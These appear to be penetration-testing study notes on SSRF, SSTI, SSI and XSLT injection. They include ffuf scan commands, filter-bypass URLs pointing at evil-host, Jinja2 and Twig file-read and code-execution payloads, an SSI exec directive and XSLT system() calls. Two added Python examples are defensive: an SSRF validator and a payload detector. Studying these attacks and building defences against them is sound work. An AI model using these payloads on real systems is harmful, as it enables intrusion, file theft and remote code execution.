Server-side Request Forgery (SSRF)
If a server retrieves resources based on user input, such as a URL, an attacker can make the server issue unintended requests.
With SSRF it is possible to make requests to unintended locations like
http://127.0.0.1

Example of an SSRF request:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin
Now the server fetches the /admin page itself. Because the request is made by the local machine, which is granted admin access, the page is returned.

Several URL schemes can be used:
http:// and https://: fetches content via HTTP(S) requests, leading to access to the internal network.
file://: used to read local files on the web server.
gopher://: sends HTTP POST requests with payloads to databases or mail servers.

Look for parameters that pass URLs and try pointing them at your own listener or at the internal network, for example
http://127.0.0.1/index.php

Back-end systems
The application server may be able to reach back-end systems and other hosts inside the network that usually have non-routable IP addresses: 10.x.x.x, 192.168.x.x, 172.16.x.x. Within these ranges we can fuzz IPs to see if anything is running on a given address.

Port scan
Based on differences in the responses we can conduct a port scan through the SSRF:
ffuf -w ./ports.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to"
Brute force directories
Look at the data in the request, e.g.
-d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01"
Fuzzing .php pages:
ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"
Local File Inclusion (LFI)
In the data payload use file://, e.g.
-d "dateserver=file:///etc/passwd&date=2024-01-01"
Blind SSRF
If we cannot see the response but there is an SSRF vulnerability, it is called a blind SSRF vulnerability. A netcat listener can confirm the vulnerability.
Bypassing SSRF Defenses
There are black-list filters that block hostnames like 127.0.0.1 and localhost. To bypass:
- Use another representation of 127.0.0.1, like 2130706433, 017700000001, or 127.1
- Register your own domain name that resolves to 127.0.0.1
- Obfuscate the address using URL encoding or mixed case.
- Try different schemes.
White-list Filters
A white-list filter only accepts predefined values, which is a lot safer than black-list filters, but it can still be bypassed with URL tricks like embedding credentials:
<!--Embed credentials using the @ char-->
https://expected-host:fakepassword@evil-host
<!--Use the # char, used to jump to other section in page-->
https://evil-host#expected-host
<!--Add the target as subdomain-->
https://expected-host.evil-host
Open redirect SSRF filter bypass
Open redirect is where the application redirects users to a user-provided URL, for example
/products/new/id=6&path=http://evil.xyz
Leverage this to bypass the URL filter and access the internal admin page:
/products/new/id=6&path=http://192.168.0.68/admin
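An added example (not from these notes) of the defender's side of the filters in the three sections above: a substring block-list of the kind the 2130706433 / 127.1 / credential / fragment / subdomain tricks defeat, next to a fail-closed check that parses the URL, normalises numeric host forms, resolves the hostname, only allows public addresses and optionally enforces an exact host allow-list. The `dns_lookup` parameter, `naive_blacklist_allows` and `is_safe_target` are names chosen here, and the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def naive_blacklist_allows(url):
    """Substring block-list of the kind the notes describe; trivially bypassed."""
    return not any(bad in url.lower() for bad in ("127.0.0.1", "localhost"))

def _system_dns(host):
    """Every address the system resolver returns for host (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def host_to_ips(host, dns_lookup=_system_dns):
    """All addresses a hostname may refer to, after normalising numeric forms."""
    try:                                    # plain IPv4/IPv6 literal, e.g. ::1
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        pass
    try:                                    # 2130706433, 017700000001, 127.1 -> 127.0.0.1
        return {socket.inet_ntoa(socket.inet_aton(host))}
    except OSError:
        pass
    return set(dns_lookup(host))            # real hostname: resolve every record

def _is_public(ip):
    addr = ipaddress.ip_address(ip)         # rejects loopback, RFC1918, link-local ...
    return addr.is_global and not addr.is_multicast

def is_safe_target(url, allowed_hosts=None, dns_lookup=_system_dns):
    """Fail-closed check to run before a server-side fetch of a user-supplied URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):   # no file://, gopher:// ...
        return False
    if parts.username is not None or parts.password is not None:
        return False                        # expected-host:pw@evil-host is rejected
    host = (parts.hostname or "").rstrip(".")  # urlsplit lower-cases and unbrackets
    if not host or (allowed_hosts is not None and host not in allowed_hosts):
        return False                        # exact match beats #fragment and subdomain tricks
    try:
        ips = host_to_ips(host, dns_lookup)
    except (OSError, LookupError):
        return False                        # unresolvable: refuse rather than guess
    return bool(ips) and all(_is_public(ip) for ip in ips)
```

The fetcher must also refuse to follow redirects (or re-run this check on every hop), otherwise the open-redirect bypass above still works, and it should connect to the address it validated rather than resolving again, to avoid DNS rebinding.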
Blind SSRF vulnerabilities
If we do not get any data back in the response, SSRF is still possible but it is called blind SSRF. The easiest way to discover these is with out-of-band techniques, using either interactsh or Burp Collaborator. In short, we feed the application a URL and wait for a DNS look-up on our server.
The Referer header is often a useful attack surface for SSRF vulnerabilities.
Server-side Template Injection or SSTI
SSTI occurs when user input is inserted into the template itself before rendering, allowing code execution. As with SQL injection, we can identify vulnerabilities using probe payloads such as:
{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Find payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md
Local File Inclusion (LFI) Jinja2
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}
Remote Code Execution (RCE) Jinja2
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Local File Inclusion (LFI) Twig
{{ "/etc/passwd"|file_excerpt(1,-1) }}
Remote Code Execution (RCE) Twig
{{ ['id'] | filter('system') }}
SSI Injection
Server-Side Includes (SSI) are used by web apps to create dynamic content in HTML pages. The use of SSI can be recognised by file extensions such as:
.shtml
.shtm
.stm
SSI uses directives consisting of:
name: the directive's name
parameter name: one or more parameters
value: one or more parameter values
Several payloads:
<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->
XSLT Injections
eXtensible Stylesheet Language Transformation (XSLT) can select specific nodes from an XML document and change the XML structure.
# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
# RCE
<xsl:value-of select="php:function('system','id')" />
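Added example, not from these notes: a triage heuristic that flags request parameter values resembling the SSTI probes, the SSI directives and the XSLT payloads listed in the sections above, after peeling URL-encoding. The rule set, the function names and the sample events are constructed here; it is meant for log review and alerting, not as a substitute for keeping user input out of templates and SSI/XSLT processing.

```python
import re
from urllib.parse import unquote_plus

# Rules mirror the probe shapes in the notes above: (family, label, regex).
# A match means "look at this request", not "the application is exploitable".
RULES = [
    ("SSTI", "arithmetic probe inside template delimiters",
     re.compile(r"(\{\{|\$\{\{?|<%=|#\{)\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*(\}\}|\}|%>)")),
    ("SSTI", "Jinja2 dunder walk towards builtins",
     re.compile(r"__(init|class|globals|builtins|import|subclasses)__")),
    ("SSTI", "Twig file_excerpt or filter('system')",
     re.compile(r"\|\s*(file_excerpt\s*\(|filter\s*\(\s*['\"]system['\"]\s*\))")),
    ("SSI", "server-side include directive",
     re.compile(r"<!--\s*#\s*(exec|include|printenv|echo|set|config)\b", re.I)),
    ("XSLT", "value-of reaching files or PHP functions",
     re.compile(r"<xsl:value-of\b[^>]*(unparsed-text|php:function)\s*\(", re.I)),
]

def classify(value, decode_rounds=2):
    """Return {(family, label)} for every rule matching the raw or URL-decoded value."""
    candidates = {value}
    for _ in range(decode_rounds):          # %7B%7B -> {{ ; %257B -> %7B -> {
        value = unquote_plus(value)
        candidates.add(value)
    return {(fam, label) for fam, label, rx in RULES
            if any(rx.search(c) for c in candidates)}

def triage(events):
    """events: iterable of (param_name, raw_value). Returns [(param, sorted families)]."""
    out = []
    for param, raw in events:
        families = sorted({fam for fam, _ in classify(raw)})
        if families:
            out.append((param, families))
    return out

# Constructed sample parameters (not a real capture); values follow the notes' payloads.
SAMPLE_EVENTS = [
    ("date", "2024-01-02"),
    ("name", "{{7*'7'}}"),
    ("name", "%24%7B%7B7*7%7D%7D"),          # ${{7*7}} URL-encoded once
    ("comment", "<!--#printenv -->"),
    ("template", "{{ self.__init__.__globals__ }}"),
    ("xsl", "<xsl:value-of select=\"unparsed-text('/etc/passwd', 'utf-8')\" />"),
]

if __name__ == "__main__":
    for param, families in triage(SAMPLE_EVENTS):
        print(f"{param}: {', '.join(families)}")
```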